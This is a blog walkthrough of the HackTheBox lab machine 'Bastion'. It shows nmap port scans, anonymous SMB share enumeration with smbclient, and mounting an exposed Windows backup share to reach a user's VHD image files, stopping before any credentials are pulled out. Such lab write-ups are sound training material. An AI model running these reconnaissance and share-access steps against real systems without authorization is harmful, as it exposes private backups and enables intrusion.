<!DOCTYPE html>
<html lang="en-us">
    <head><meta charset='utf-8'>
<meta name='viewport' content='width=device-width, initial-scale=1'><meta name='description' content='BOX INFO :computer: :Operative System : Windows 🌐Difficulty : Easy :waxing_gibbous_moon:Owner : L4mpjeIP : 10.10.10.134[&#43;] PART 1 - GAIN ACCESS To get a fast scan, we&amp;rsquo;re using this command to discovery ports:
nmap -p- --open -T5 -n 10.10.10.134
22/tcp open ssh135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds49664/tcp open unknown49665/tcp open unknown49667/tcp open unknown49668/tcp open unknown49669/tcp open unknown49670/tcp open unknownOnce seen that, we can get a deeper scan to those ports :'><title>[6] Bastion Hackthebox</title>

<link rel='canonical' href='https://example.com/posts/bastion-hackthebox/'>

<link rel="stylesheet" href="/scss/style.min.css"><meta property='og:title' content='[6] Bastion Hackthebox'>
<meta property='og:description' content='BOX INFO :computer: :Operative System : Windows 🌐Difficulty : Easy :waxing_gibbous_moon:Owner : L4mpjeIP : 10.10.10.134[&#43;] PART 1 - GAIN ACCESS To get a fast scan, we&amp;rsquo;re using this command to discovery ports:
nmap -p- --open -T5 -n 10.10.10.134
22/tcp open ssh135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds49664/tcp open unknown49665/tcp open unknown49667/tcp open unknown49668/tcp open unknown49669/tcp open unknown49670/tcp open unknownOnce seen that, we can get a deeper scan to those ports :'>
<meta property='og:url' content='https://example.com/posts/bastion-hackthebox/'>
<meta property='og:site_name' content='Maikypedia'>
<meta property='og:type' content='article'><meta property='article:section' content='Posts' /><meta property='article:published_time' content='2021-03-19T01:01:04&#43;01:00'/><meta property='article:modified_time' content='2021-03-19T01:01:04&#43;01:00'/>
<meta name="twitter:title" content="[6] Bastion Hackthebox">
<meta name="twitter:description" content="BOX INFO :computer: :Operative System : Windows 🌐Difficulty : Easy :waxing_gibbous_moon:Owner : L4mpjeIP : 10.10.10.134[&#43;] PART 1 - GAIN ACCESS To get a fast scan, we&amp;rsquo;re using this command to discovery ports:
nmap -p- --open -T5 -n 10.10.10.134
22/tcp open ssh135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds49664/tcp open unknown49665/tcp open unknown49667/tcp open unknown49668/tcp open unknown49669/tcp open unknown49670/tcp open unknownOnce seen that, we can get a deeper scan to those ports :">
    </head>
    <body class="article-page keep-sidebar">
    <script>
        (function() {
            const colorSchemeKey = 'StackColorScheme';
            if(!localStorage.getItem(colorSchemeKey)){
                localStorage.setItem(colorSchemeKey, "auto");
            }
        })();
    </script><script>
    (function() {
        const colorSchemeKey = 'StackColorScheme';
        const colorSchemeItem = localStorage.getItem(colorSchemeKey);
        const supportDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches === true;

        if (colorSchemeItem == 'dark' || colorSchemeItem === 'auto' && supportDarkMode) {
            

            document.body.dataset.scheme = 'dark';
        } else {
            document.body.dataset.scheme = 'light';
        }
    })();
</script><div class="container main-container flex on-phone--column extended ">
            <aside class="sidebar left-sidebar sticky">
    <button class="hamburger hamburger--spin" type="button" id="toggle-menu" aria-label="Toggle Menu">
        <span class="hamburger-box">
            <span class="hamburger-inner"></span>
        </span>
    </button>

    <header class="site-info">
        
            <figure class="site-avatar">
                
                    
                    
                    
                        
                        <img src="/img/maiky_hue62232bf39c5ba17479eab350663cd81_63325_300x0_resize_q75_box.jpeg" width="300"
                            height="300" class="site-logo" loading="lazy" alt="Avatar">
                    
                

                
                    <span class="emoji">🕵️</span>
                
            </figure>
        
        <h1 class="site-name"><a href="https://example.com">Maikypedia</a></h1>
        <h2 class="site-description">I&#39;m Maiky...</h2>
    </header>

    <ol class="menu" id="main-menu">
        
        
        

        <li >
            <a href='/posts'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-home" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <polyline points="5 12 3 12 12 3 21 12 19 12" />
  <path d="M5 12v7a2 2 0 0 0 2 2h10a2 2 0 0 0 2 -2v-7" />
  <path d="M9 21v-6a2 2 0 0 1 2 -2h2a2 2 0 0 1 2 2v6" />
</svg>



                
                <span>Home</span>
            </a>
        </li>
        
        

        <li >
            <a href='/categories/hack-the-box'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="24" height="24" preserveAspectRatio="xMidYMid meet" viewBox="0 0 24 24" style="-ms-transform: rotate(360deg); -webkit-transform: rotate(360deg); transform: rotate(360deg);"><path d="M11.996 0a1.119 1.119 0 0 0-.057.003a.9.9 0 0 0-.236.05a.907.907 0 0 0-.165.079L1.936 5.675a.889.889 0 0 0-.445.77V17.556a.889.889 0 0 0 .47.784l9.598 5.541l.054.029v.002a.857.857 0 0 0 .083.035l.012.004c.028.01.056.018.085.024c.01.001.011.003.016.004a.93.93 0 0 0 .296.015a.683.683 0 0 0 .086-.015c.01 0 .011-.002.016-.004a.94.94 0 0 0 .085-.024l.012-.004a.882.882 0 0 0 .083-.035v-.002a1.086 1.086 0 0 0 .054-.029l9.599-5.541a.889.889 0 0 0 .469-.784V6.48l-.001-.026v-.008a.889.889 0 0 0-.312-.676l-.029-.024c0-.002-.01-.005-.01-.007a.899.899 0 0 0-.107-.07L12.453.127A.887.887 0 0 0 11.99 0zm.01 2.253c.072 0 .144.019.209.056l6.537 3.774a.418.418 0 0 1 0 .724l-6.537 3.774a.418.418 0 0 1-.418 0L5.26 6.807a.418.418 0 0 1 0-.724l6.537-3.774a.42.42 0 0 1 .209-.056zm-8.08 6.458a.414.414 0 0 1 .215.057l6.524 3.766a.417.417 0 0 1 .208.361v7.533a.417.417 0 0 1-.626.361l-6.523-3.766a.417.417 0 0 1-.209-.362V9.13c0-.241.196-.414.41-.418zm16.16 0c.215.004.41.177.41.418v7.532c0 .15-.08.287-.208.362l-6.524 3.766a.417.417 0 0 1-.626-.361v-7.533c0-.149.08-.286.209-.36l6.523-3.767a.415.415 0 0 1 .216-.057z" fill="#626262"/><rect x="0" y="0" width="24" height="24" fill="rgba(0, 0, 0, 0)" /></svg>
                
                <span>HackTheBox</span>
            </a>
        </li>
        
        

        <li >
            <a href='https://www.instagram.com/c.pasttor/'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M12 2.163c3.204 0 3.584.012 4.85.07 3.252.148 4.771 1.691 4.919 4.919.058 1.265.069 1.645.069 4.849 0 3.205-.012 3.584-.069 4.849-.149 3.225-1.664 4.771-4.919 4.919-1.266.058-1.644.07-4.85.07-3.204 0-3.584-.012-4.849-.07-3.26-.149-4.771-1.699-4.919-4.92-.058-1.265-.07-1.644-.07-4.849 0-3.204.013-3.583.07-4.849.149-3.227 1.664-4.771 4.919-4.919 1.266-.057 1.645-.069 4.849-.069zm0-2.163c-3.259 0-3.667.014-4.947.072-4.358.2-6.78 2.618-6.98 6.98-.059 1.281-.073 1.689-.073 4.948 0 3.259.014 3.668.072 4.948.2 4.358 2.618 6.78 6.98 6.98 1.281.058 1.689.072 4.948.072 3.259 0 3.668-.014 4.948-.072 4.354-.2 6.782-2.618 6.979-6.98.059-1.28.073-1.689.073-4.948 0-3.259-.014-3.667-.072-4.947-.196-4.354-2.617-6.78-6.979-6.98-1.281-.059-1.69-.073-4.949-.073zm0 5.838c-3.403 0-6.162 2.759-6.162 6.162s2.759 6.163 6.162 6.163 6.162-2.759 6.162-6.163c0-3.403-2.759-6.162-6.162-6.162zm0 10.162c-2.209 0-4-1.79-4-4 0-2.209 1.791-4 4-4s4 1.791 4 4c0 2.21-1.791 4-4 4zm6.406-11.845c-.796 0-1.441.645-1.441 1.44s.645 1.44 1.441 1.44c.795 0 1.439-.645 1.439-1.44s-.644-1.44-1.439-1.44z"/></svg>
                
                <span>Instagram</span>
            </a>
        </li>
        
        

        <li >
            <a href='https://twitter.com/Maiky_py'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M24 4.557c-.883.392-1.832.656-2.828.775 1.017-.609 1.798-1.574 2.165-2.724-.951.564-2.005.974-3.127 1.195-.897-.957-2.178-1.555-3.594-1.555-3.179 0-5.515 2.966-4.797 6.045-4.091-.205-7.719-2.165-10.148-5.144-1.29 2.213-.669 5.108 1.523 6.574-.806-.026-1.566-.247-2.229-.616-.054 2.281 1.581 4.415 3.949 4.89-.693.188-1.452.232-2.224.084.626 1.956 2.444 3.379 4.6 3.419-2.07 1.623-4.678 2.348-7.29 2.04 2.179 1.397 4.768 2.212 7.548 2.212 9.142 0 14.307-7.721 13.995-14.646.962-.695 1.797-1.562 2.457-2.549z"/></svg>
                
                <span>Twitter</span>
            </a>
        </li>
        
        

        <li >
            <a href='/about/whoami'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-user" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="7" r="4" />
  <path d="M6 21v-2a4 4 0 0 1 4 -4h4a4 4 0 0 1 4 4v2" />
</svg>



                
                <span>Whoami</span>
            </a>
        </li>
        

        
            <li id="dark-mode-toggle">
                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-left" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="8" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-right" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="16" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                <span>Dark Mode</span>
            </li>
        
    </ol>
</aside>

            <main class="main full-width">
    <article class="main-article">
    <header class="article-header">

    <div class="article-details">
    
    <header class="article-category">
        
            <a href="/categories/hack-the-box/" >
                Hack-The-Box
            </a>
        
    </header>
    

    <h2 class="article-title">
        <a href="/posts/bastion-hackthebox/">[6] Bastion Hackthebox</a>
    </h2>

    <footer class="article-time">
        <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-clock" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="12" r="9" />
  <polyline points="12 7 12 12 15 15" />
</svg>



        <time class="article-time--published">Mar 19, 2021</time>
    </footer></div>
</header>

    <section class="article-content">
    <pre><code>BOX INFO :computer: :

Operative System : Windows 🌐
Difficulty : Easy :waxing_gibbous_moon:
Owner : L4mpje
IP : 10.10.10.134
</code></pre><h1 id="-part-1---gain-access">[+] PART 1 - GAIN ACCESS</h1>
<p>To get a fast scan, we&rsquo;re using this command to discovery ports:</p>
<p><code>nmap -p- --open -T5 -n 10.10.10.134</code></p>
<pre><code>22/tcp    open  ssh
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49664/tcp open  unknown
49665/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
</code></pre><p>Once seen that, we can get a deeper scan to those ports :</p>
<p><code>nmap -sC -sS -p22,135,139,445,5985,47001,49664,49666,49667,49668,49670 10.10.10.134</code></p>
<div class="highlight"><pre class="chroma"><code class="language-s" data-lang="s"><span class="n">PORT</span>      <span class="n">STATE</span> <span class="n">SERVICE</span>
<span class="m">22</span><span class="o">/</span><span class="n">tcp</span>    <span class="n">open</span>  <span class="n">ssh</span>
<span class="o">|</span> <span class="n">ssh</span><span class="o">-</span><span class="n">hostkey</span><span class="o">:</span> 
<span class="o">|</span>   <span class="m">2048</span> <span class="m">3</span><span class="n">a</span><span class="o">:</span><span class="m">56</span><span class="o">:</span><span class="n">ae</span><span class="o">:</span><span class="m">75</span><span class="o">:</span><span class="m">3</span><span class="n">c</span><span class="o">:</span><span class="m">78</span><span class="o">:</span><span class="m">0</span><span class="n">e</span><span class="o">:</span><span class="n">c8</span><span class="o">:</span><span class="m">56</span><span class="o">:</span><span class="m">4</span><span class="n">d</span><span class="o">:</span><span class="n">cb</span><span class="o">:</span><span class="m">1</span><span class="n">c</span><span class="o">:</span><span class="m">22</span><span class="o">:</span><span class="n">bf</span><span class="o">:</span><span class="m">45</span><span class="o">:</span><span class="m">8</span><span class="nf">a </span><span class="p">(</span><span class="n">RSA</span><span class="p">)</span>
<span class="o">|</span>   <span class="m">256</span> <span class="n">cc</span><span class="o">:</span><span class="m">2</span><span class="n">e</span><span class="o">:</span><span class="m">56</span><span class="o">:</span><span class="n">ab</span><span class="o">:</span><span class="m">19</span><span class="o">:</span><span class="m">97</span><span class="o">:</span><span class="n">d5</span><span class="o">:</span><span class="n">bb</span><span class="o">:</span><span class="m">03</span><span class="o">:</span><span class="n">fb</span><span class="o">:</span><span class="m">82</span><span class="o">:</span><span class="n">cd</span><span class="o">:</span><span class="m">63</span><span class="o">:</span><span class="n">da</span><span class="o">:</span><span class="m">68</span><span class="o">:</span><span class="m">01</span> <span class="p">(</span><span class="n">ECDSA</span><span class="p">)</span>
<span class="o">|</span><span class="n">_</span>  <span class="m">256</span> <span class="m">93</span><span class="o">:</span><span class="m">5</span><span class="n">f</span><span class="o">:</span><span class="m">5</span><span class="n">d</span><span class="o">:</span><span class="n">aa</span><span class="o">:</span><span class="n">ca</span><span class="o">:</span><span class="m">9</span><span class="n">f</span><span class="o">:</span><span class="m">53</span><span class="o">:</span><span class="n">e7</span><span class="o">:</span><span class="n">f2</span><span class="o">:</span><span class="m">82</span><span class="o">:</span><span class="n">e6</span><span class="o">:</span><span class="m">64</span><span class="o">:</span><span class="n">a8</span><span class="o">:</span><span class="n">a3</span><span class="o">:</span><span class="n">a0</span><span class="o">:</span><span class="m">18</span> <span class="p">(</span><span class="n">ED25519</span><span class="p">)</span>
<span class="m">135</span><span class="o">/</span><span class="n">tcp</span>   <span class="n">open</span>  <span class="n">msrpc</span>
<span class="m">139</span><span class="o">/</span><span class="n">tcp</span>   <span class="n">open</span>  <span class="n">netbios</span><span class="o">-</span><span class="n">ssn</span>
<span class="m">445</span><span class="o">/</span><span class="n">tcp</span>   <span class="n">open</span>  <span class="n">microsoft</span><span class="o">-</span><span class="n">ds</span>
<span class="m">5985</span><span class="o">/</span><span class="n">tcp</span>  <span class="n">open</span>  <span class="n">wsman</span>
<span class="m">47001</span><span class="o">/</span><span class="n">tcp</span> <span class="n">open</span>  <span class="n">winrm</span>
<span class="m">49664</span><span class="o">/</span><span class="n">tcp</span> <span class="n">open</span>  <span class="n">unknown</span>
<span class="m">49666</span><span class="o">/</span><span class="n">tcp</span> <span class="n">open</span>  <span class="n">unknown</span>
<span class="m">49667</span><span class="o">/</span><span class="n">tcp</span> <span class="n">open</span>  <span class="n">unknown</span>
<span class="m">49668</span><span class="o">/</span><span class="n">tcp</span> <span class="n">open</span>  <span class="n">unknown</span>
<span class="m">49670</span><span class="o">/</span><span class="n">tcp</span> <span class="n">open</span>  <span class="n">unknown</span>

<span class="n">Host</span> <span class="n">script</span> <span class="n">results</span><span class="o">:</span>
<span class="o">|</span><span class="n">_clock</span><span class="o">-</span><span class="n">skew</span><span class="o">:</span> <span class="n">mean</span><span class="o">:</span> <span class="m">-20</span><span class="n">m00s</span><span class="p">,</span> <span class="n">deviation</span><span class="o">:</span> <span class="m">34</span><span class="n">m35s</span><span class="p">,</span> <span class="n">median</span><span class="o">:</span> <span class="m">-2</span><span class="n">s</span>
<span class="o">|</span> <span class="n">smb</span><span class="o">-</span><span class="n">os</span><span class="o">-</span><span class="n">discovery</span><span class="o">:</span> 
<span class="o">|</span>   <span class="n">OS</span><span class="o">:</span> <span class="n">Windows</span> <span class="n">Server</span> <span class="m">2016</span> <span class="n">Standard</span> <span class="m">14393</span> <span class="p">(</span><span class="n">Windows</span> <span class="n">Server</span> <span class="m">2016</span> <span class="n">Standard</span> <span class="m">6.3</span><span class="p">)</span>
<span class="o">|</span>   <span class="n">Computer</span> <span class="n">name</span><span class="o">:</span> <span class="n">Bastion</span>
<span class="o">|</span>   <span class="n">NetBIOS</span> <span class="n">computer</span> <span class="n">name</span><span class="o">:</span> <span class="n">BASTION\x00</span>
<span class="o">|</span>   <span class="n">Workgroup</span><span class="o">:</span> <span class="n">WORKGROUP\x00</span>
<span class="o">|</span><span class="n">_</span>  <span class="n">System</span> <span class="n">time</span><span class="o">:</span> <span class="m">2021-03-19</span><span class="n">T01</span><span class="o">:</span><span class="m">11</span><span class="o">:</span><span class="m">10+01</span><span class="o">:</span><span class="m">00</span>
<span class="o">|</span> <span class="n">smb</span><span class="o">-</span><span class="n">security</span><span class="o">-</span><span class="n">mode</span><span class="o">:</span> 
<span class="o">|</span>   <span class="n">account_used</span><span class="o">:</span> <span class="n">guest</span>
<span class="o">|</span>   <span class="n">authentication_level</span><span class="o">:</span> <span class="n">user</span>
<span class="o">|</span>   <span class="n">challenge_response</span><span class="o">:</span> <span class="n">supported</span>
<span class="o">|</span><span class="n">_</span>  <span class="n">message_signing</span><span class="o">:</span> <span class="nf">disabled </span><span class="p">(</span><span class="n">dangerous</span><span class="p">,</span> <span class="n">but</span> <span class="n">default</span><span class="p">)</span>
<span class="o">|</span> <span class="n">smb2</span><span class="o">-</span><span class="n">security</span><span class="o">-</span><span class="n">mode</span><span class="o">:</span> 
<span class="o">|</span>   <span class="m">2.02</span><span class="o">:</span> 
<span class="o">|</span><span class="n">_</span>    <span class="n">Message</span> <span class="n">signing</span> <span class="n">enabled</span> <span class="n">but</span> <span class="n">not</span> <span class="n">required</span>
<span class="o">|</span> <span class="n">smb2</span><span class="o">-</span><span class="n">time</span><span class="o">:</span> 
<span class="o">|</span>   <span class="n">date</span><span class="o">:</span> <span class="m">2021-03-19</span><span class="n">T00</span><span class="o">:</span><span class="m">11</span><span class="o">:</span><span class="m">07</span>
<span class="o">|</span><span class="n">_</span>  <span class="n">start_date</span><span class="o">:</span> <span class="m">2021-03-18</span><span class="n">T23</span><span class="o">:</span><span class="m">57</span><span class="o">:</span><span class="m">11</span>
</code></pre></div><p>Okay, so we can see a samba service, let&rsquo;s enumerate it to see what can we get from it :</p>
<p><code>smbclient -L 10.10.10.134</code></p>
<div class="highlight"><pre class="chroma"><code class="language-s" data-lang="s">        <span class="n">Sharename</span>       <span class="n">Type</span>      <span class="n">Comment</span>
        <span class="o">---------</span>       <span class="o">----</span>      <span class="o">-------</span>
        <span class="n">ADMIN</span><span class="o">$</span>          <span class="n">Disk</span>      <span class="n">Remote</span> <span class="n">Admin</span>
        <span class="n">Backups</span>         <span class="n">Disk</span>      
        <span class="n">C</span><span class="o">$</span>              <span class="n">Disk</span>      <span class="n">Default</span> <span class="n">share</span>
        <span class="n">IPC</span><span class="o">$</span>            <span class="n">IPC</span>       <span class="n">Remote</span> <span class="n">IPC</span>
<span class="n">SMB1</span> <span class="n">disabled</span> <span class="o">--</span> <span class="n">no</span> <span class="n">workgroup</span> <span class="n">available</span>
</code></pre></div><p>Oh! Backups is interesting, let&rsquo;s see inside there :</p>
<p><code>smbclient //10.10.10.134/Backups -N</code></p>
<pre><code>smb: \&gt; ls
  .                                   D        0  Fri Mar 19 19:12:19 2021
  ..                                  D        0  Fri Mar 19 19:12:19 2021
  LQUNGYWDIR                          D        0  Fri Mar 19 19:12:19 2021
  note.txt                           AR      116  Tue Apr 16 06:10:09 2019
  SDT65CB.tmp                         A        0  Fri Feb 22 07:43:08 2019
  WindowsImageBackup                 Dn        0  Fri Feb 22 07:44:02 2019
</code></pre><p>Let&rsquo;s check note.txt  :</p>
<p><code>note.txt</code></p>
<pre><code>
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

</code></pre><p>Okay? Maybe it means that we have to make some kind of mount later instead of downloading it, let&rsquo;s keep enumerating, inside WindowsImageBackup we have this :</p>
<pre><code>  .                                  Dn        0  Fri Feb 22 07:44:02 2019
  ..                                 Dn        0  Fri Feb 22 07:44:02 2019
  L4mpje-PC                          Dn        0  Fri Feb 22 07:45:32 2019
</code></pre><p>This is so nice, so, we have the whole backup of the user L4mpje, maybe we can get some creds from here. So as &ldquo;note.txt&rdquo; said, we should get a mount on our system (this is not really necessary but using this we can work better):</p>
<p><code>mkdir /mnt/Bastion</code></p>
<p><code>sudo mount -t cifs //10.10.10.134/Backups /mnt/Bastion</code></p>
<p>Once done this, we will continue enumerating&hellip; Inside L4mje-PC I found this :</p>
<div class="highlight"><pre class="chroma"><code class="language-s" data-lang="s"><span class="n">total</span> <span class="m">8</span>
<span class="n">drwxr</span><span class="o">-</span><span class="n">xr</span><span class="o">-</span><span class="n">x</span> <span class="m">2</span> <span class="n">root</span> <span class="n">root</span> <span class="m">4096</span> <span class="n">feb</span> <span class="m">22</span>  <span class="m">2019</span>  <span class="n">.
</span><span class="n">drwxr</span><span class="o">-</span><span class="n">xr</span><span class="o">-</span><span class="n">x</span> <span class="m">2</span> <span class="n">root</span> <span class="n">root</span>    <span class="m">0</span> <span class="n">feb</span> <span class="m">22</span>  <span class="m">2019</span>  <span class="n">..</span>
<span class="n">drwxr</span><span class="o">-</span><span class="n">xr</span><span class="o">-</span><span class="n">x</span> <span class="m">2</span> <span class="n">root</span> <span class="n">root</span>    <span class="m">0</span> <span class="n">feb</span> <span class="m">22</span>  <span class="m">2019</span> <span class="s">&#39;Backup 2019-02-22 124351&#39;</span>
<span class="n">drwxr</span><span class="o">-</span><span class="n">xr</span><span class="o">-</span><span class="n">x</span> <span class="m">2</span> <span class="n">root</span> <span class="n">root</span>    <span class="m">0</span> <span class="n">feb</span> <span class="m">22</span>  <span class="m">2019</span>  <span class="n">Catalog</span>
<span class="o">-</span><span class="n">rwxr</span><span class="o">-</span><span class="n">xr</span><span class="o">-</span><span class="n">x</span> <span class="m">1</span> <span class="n">root</span> <span class="n">root</span>   <span class="m">16</span> <span class="n">feb</span> <span class="m">22</span>  <span class="m">2019</span>  <span class="n">MediaId</span>
<span class="n">drwxr</span><span class="o">-</span><span class="n">xr</span><span class="o">-</span><span class="n">x</span> <span class="m">2</span> <span class="n">root</span> <span class="n">root</span>    <span class="m">0</span> <span class="n">feb</span> <span class="m">22</span>  <span class="m">2019</span>  <span class="n">SPPMetadataCache</span>
</code></pre></div><p>So, as I said, we have the whole backup, let&rsquo;s see what&rsquo;s inside :</p>
<div class="highlight"><pre class="chroma"><code class="language-s" data-lang="s"><span class="n">total</span> <span class="m">5330572</span>
<span class="n">drwxr</span><span class="o">-</span><span class="n">xr</span><span class="o">-</span><span class="n">x</span> <span class="m">2</span> <span class="n">root</span> <span class="n">root</span>       <span class="m">8192</span> <span class="n">feb</span> <span class="m">22</span>  <span class="m">2019</span> <span class="n">.
</span><span class="n">drwxr</span><span class="o">-</span><span class="n">xr</span><span class="o">-</span><span class="n">x</span> <span class="m">2</span> <span class="n">root</span> <span class="n">root</span>       <span class="m">4096</span> <span class="n">feb</span> <span class="m">22</span>  <span class="m">2019</span> <span class="n">..</span>
<span class="o">-</span><span class="n">rwxr</span><span class="o">-</span><span class="n">xr</span><span class="o">-</span><span class="n">x</span> <span class="m">1</span> <span class="n">root</span> <span class="n">root</span>   <span class="m">37761024</span> <span class="n">feb</span> <span class="m">22</span>  <span class="m">2019</span> <span class="m">9</span><span class="n">b9cfbc3</span><span class="m">-369e-11</span><span class="n">e9</span><span class="o">-</span><span class="n">a17c</span><span class="m">-806e6</span><span class="n">f6e6963.vhd</span>
<span class="o">-</span><span class="n">rwxr</span><span class="o">-</span><span class="n">xr</span><span class="o">-</span><span class="n">x</span> <span class="m">1</span> <span class="n">root</span> <span class="n">root</span> <span class="m">5418299392</span> <span class="n">feb</span> <span class="m">22</span>  <span class="m">2019</span> <span class="m">9</span><span class="n">b9cfbc4</span><span class="m">-369e-11</span><span class="n">e9</span><span class="o">-</span><span class="n">a17c</span><span class="m">-806e6</span><span class="n">f6e6963.vhd</span>
<span class="o">-</span><span class="n">rwxr</span><span class="o">-</span><span class="n">xr</span><span class="o">-</span><span class="n">x</span> <span class="m">1</span> <span class="n">root</span> <span class="n">root</span>       <span class="m">1186</span> <span class="n">feb</span> <span class="m">22</span>  <span class="m">2019</span> <span class="n">BackupSpecs.xml</span>
<span class="o">-</span><span class="n">rwxr</span><span class="o">-</span><span class="n">xr</span><span class="o">-</span><span class="n">x</span> <span class="m">1</span> <span class="n">root</span> <span class="n">root</span>       <span class="m">1078</span> <span class="n">feb</span> <span class="m">22</span>  <span class="m">2019</span> <span class="n">cd113385</span><span class="m">-65</span><span class="n">ff</span><span class="m">-4</span><span class="n">ea2</span><span class="m">-8</span><span class="n">ced</span><span class="m">-5630</span><span class="n">f6feca8f_AdditionalFilesc3b9f3c7</span><span class="m">-5e52-4</span><span class="n">d5e</span><span class="m">-8</span><span class="n">b20</span><span class="m">-19</span><span class="n">adc95a34c7.xml</span>
<span class="o">-</span><span class="n">rwxr</span><span class="o">-</span><span class="n">xr</span><span class="o">-</span><span class="n">x</span> <span class="m">1</span> <span class="n">root</span> <span class="n">root</span>       <span class="m">8930</span> <span class="n">feb</span> <span class="m">22</span>  <span class="m">2019</span> <span class="n">cd113385</span><span class="m">-65</span><span class="n">ff</span><span class="m">-4</span><span class="n">ea2</span><span class="m">-8</span><span class="n">ced</span><span class="m">-5630</span><span class="n">f6feca8f_Components.xml</span>
<span class="o">-</span><span class="n">rwxr</span><span class="o">-</span><span class="n">xr</span><span class="o">-</span><span class="n">x</span> <span class="m">1</span> <span class="n">root</span> <span class="n">root</span>       <span class="m">6542</span> <span class="n">feb</span> <span class="m">22</span>  <span class="m">2019</span> <span class="n">cd113385</span><span class="m">-65</span><span class="n">ff</span><span class="m">-4</span><span class="n">ea2</span><span class="m">-8</span><span class="n">ced</span><span class="m">-5630</span><span class="n">f6feca8f_RegistryExcludes.xml</span>
<span class="o">-</span><span class="n">rwxr</span><span class="o">-</span><span class="n">xr</span><span class="o">-</span><span class="n">x</span> <span class="m">1</span> <span class="n">root</span> <span class="n">root</span>       <span class="m">2894</span> <span class="n">feb</span> <span class="m">22</span>  <span class="m">2019</span> <span class="n">cd113385</span><span class="m">-65</span><span class="n">ff</span><span class="m">-4</span><span class="n">ea2</span><span class="m">-8</span><span class="n">ced</span><span class="m">-5630</span><span class="n">f6feca8f_Writer4dc3bdd4</span><span class="o">-</span><span class="n">ab48</span><span class="m">-4</span><span class="n">d07</span><span class="o">-</span><span class="n">adb0</span><span class="m">-3</span><span class="n">bee2926fd7f.xml</span>
<span class="o">-</span><span class="n">rwxr</span><span class="o">-</span><span class="n">xr</span><span class="o">-</span><span class="n">x</span> <span class="m">1</span> <span class="n">root</span> <span class="n">root</span>       <span class="m">1488</span> <span class="n">feb</span> <span class="m">22</span>  <span class="m">2019</span> <span class="n">cd113385</span><span class="m">-65</span><span class="n">ff</span><span class="m">-4</span><span class="n">ea2</span><span class="m">-8</span><span class="n">ced</span><span class="m">-5630</span><span class="n">f6feca8f_Writer542da469</span><span class="o">-</span><span class="n">d3e1</span><span class="m">-473</span><span class="n">c</span><span class="m">-9</span><span class="n">f4f</span><span class="m">-7847</span><span class="n">f01fc64f.xml</span>
<span class="o">-</span><span class="n">rwxr</span><span class="o">-</span><span class="n">xr</span><span class="o">-</span><span class="n">x</span> <span class="m">1</span> <span class="n">root</span> <span class="n">root</span>       <span class="m">1484</span> <span class="n">feb</span> <span class="m">22</span>  <span class="m">2019</span> <span class="n">cd113385</span><span class="m">-65</span><span class="n">ff</span><span class="m">-4</span><span class="n">ea2</span><span class="m">-8</span><span class="n">ced</span><span class="m">-5630</span><span class="n">f6feca8f_Writera6ad56c2</span><span class="o">-</span><span class="n">b509</span><span class="m">-4e6</span><span class="n">c</span><span class="o">-</span><span class="n">bb19</span><span class="m">-49</span><span class="n">d8f43532f0.xml</span>
<span class="o">-</span><span class="n">rwxr</span><span class="o">-</span><span class="n">xr</span><span class="o">-</span><span class="n">x</span> <span class="m">1</span> <span class="n">root</span> <span class="n">root</span>       <span class="m">3844</span> <span class="n">feb</span> <span class="m">22</span>  <span class="m">2019</span> <span class="n">cd113385</span><span class="m">-65</span><span class="n">ff</span><span class="m">-4</span><span class="n">ea2</span><span class="m">-8</span><span class="n">ced</span><span class="m">-5630</span><span class="n">f6feca8f_Writerafbab4a2</span><span class="m">-367</span><span class="n">d</span><span class="m">-4</span><span class="n">d15</span><span class="o">-</span><span class="n">a586</span><span class="m">-71</span><span class="n">dbb18f8485.xml</span>
<span class="o">-</span><span class="n">rwxr</span><span class="o">-</span><span class="n">xr</span><span class="o">-</span><span class="n">x</span> <span class="m">1</span> <span class="n">root</span> <span class="n">root</span>       <span class="m">3988</span> <span class="n">feb</span> <span class="m">22</span>  <span class="m">2019</span> <span class="n">cd113385</span><span class="m">-65</span><span class="n">ff</span><span class="m">-4</span><span class="n">ea2</span><span class="m">-8</span><span class="n">ced</span><span class="m">-5630</span><span class="n">f6feca8f_Writerbe000cbe</span><span class="m">-11</span><span class="n">fe</span><span class="m">-4426-9</span><span class="n">c58</span><span class="m">-531</span><span class="n">aa6355fc4.xml</span>
